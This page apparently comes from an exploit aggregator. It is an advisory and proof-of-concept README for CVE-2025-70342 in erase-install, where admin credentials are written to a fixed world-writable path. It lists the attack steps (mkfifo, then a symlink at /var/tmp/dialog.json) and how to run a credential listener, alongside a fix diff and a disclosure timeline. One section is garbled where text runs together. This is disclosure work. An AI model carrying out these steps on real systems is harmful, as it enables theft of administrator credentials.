Share
## https://sploitus.com/exploit?id=9B8B087E-4178-5823-B271-5825B0E829E5
# CVE-2025-70342: Credential Interception via Named Pipe in erase-install

## Summary

erase-install prior to v40.4 (commit 2c31239) writes swiftDialog credential output to a hardcoded path `/var/tmp/dialog.json`. On Apple Silicon Macs, admin credentials entered during reinstall/erase operations are written to this predictable, world-writable location. A local unprivileged attacker can create a named pipe (FIFO) at this path to intercept admin credentials in real time.

## Affected Versions

- **Vulnerable:** erase-install /dev/null > "$dialog_output"
```

On Apple Silicon Macs, erase-install prompts the admin for credentials via swiftDialog. The credentials (username + password) are written via shell redirect to `/var/tmp/dialog.json` โ€” a hardcoded path in a world-writable directory. The script does not check whether this path has been tampered with before writing.

### Attack Scenario

```
1. Unprivileged attacker creates a named pipe (FIFO): mkfifo /tmp/.fifo
2. Attacker creates symlink: ln -s /tmp/.fifo /var/tmp/dialog.json
3. Attacker reads from FIFO (blocks, waiting for data)
4. Admin runs: sudo erase-install.sh --erase
5. Admin enters credentials in swiftDialog prompt
6. Credentials flow through symlink โ†’ FIFO โ†’ attacker's terminal
```

This attack requires no special timing or race condition โ€” the attacker simply plants the symlink and waits.

## Proof of Concept

### Prerequisites

- Apple Silicon Mac (credential prompt only triggers on arm64)
- Any unprivileged local user account

### Usage

```bash
# Start the listener (as unprivileged user)
python3 poc.py

# Wait for admin to run erase-install with --erase or --reinstall
# Credentials will be printed to stdout when captured

# Cleanup
python3 poc.py --cleanup
```

See `poc.py` for full details.

## Remediation

- **Upgrade** erase-install to the version containing commit [2c31239](https://github.com/grahampugh/erase-install/commit/2c31239fb8519d87577514b3db9ddb0771232a21) or later
- The fix uses `mktemp` to generate a random filename, preventing path prediction:

```diff
- dialog_output="/var/tmp/dialog.json"
+ dialog_output=$(/usr/bin/mktemp /var/tmp/dialog.XXX.json)
```

## Timeline

| Date | Event |
|------|-------|
| 2024-12-23 | Vulnerability discovered |
| 2024-12-23 | Issue reported to maintainer |
| 2024-12-24 | Fix merged via PR [#574](https://github.com/grahampugh/erase-install/pull/574) |
| 2026-02-20 | CVE-2025-70342 assigned |

## Credit

- **Rambo Anderson-You**
- **cooldadhacking** ([GitHub](https://github.com/cooldadhacking))

## References

- [erase-install PR #574](https://github.com/grahampugh/erase-install/pull/574)
- [Fix commit 2c31239](https://github.com/grahampugh/erase-install/commit/2c31239fb8519d87577514b3db9ddb0771232a21)

## Disclaimer

This proof of concept is provided for educational and authorized security testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.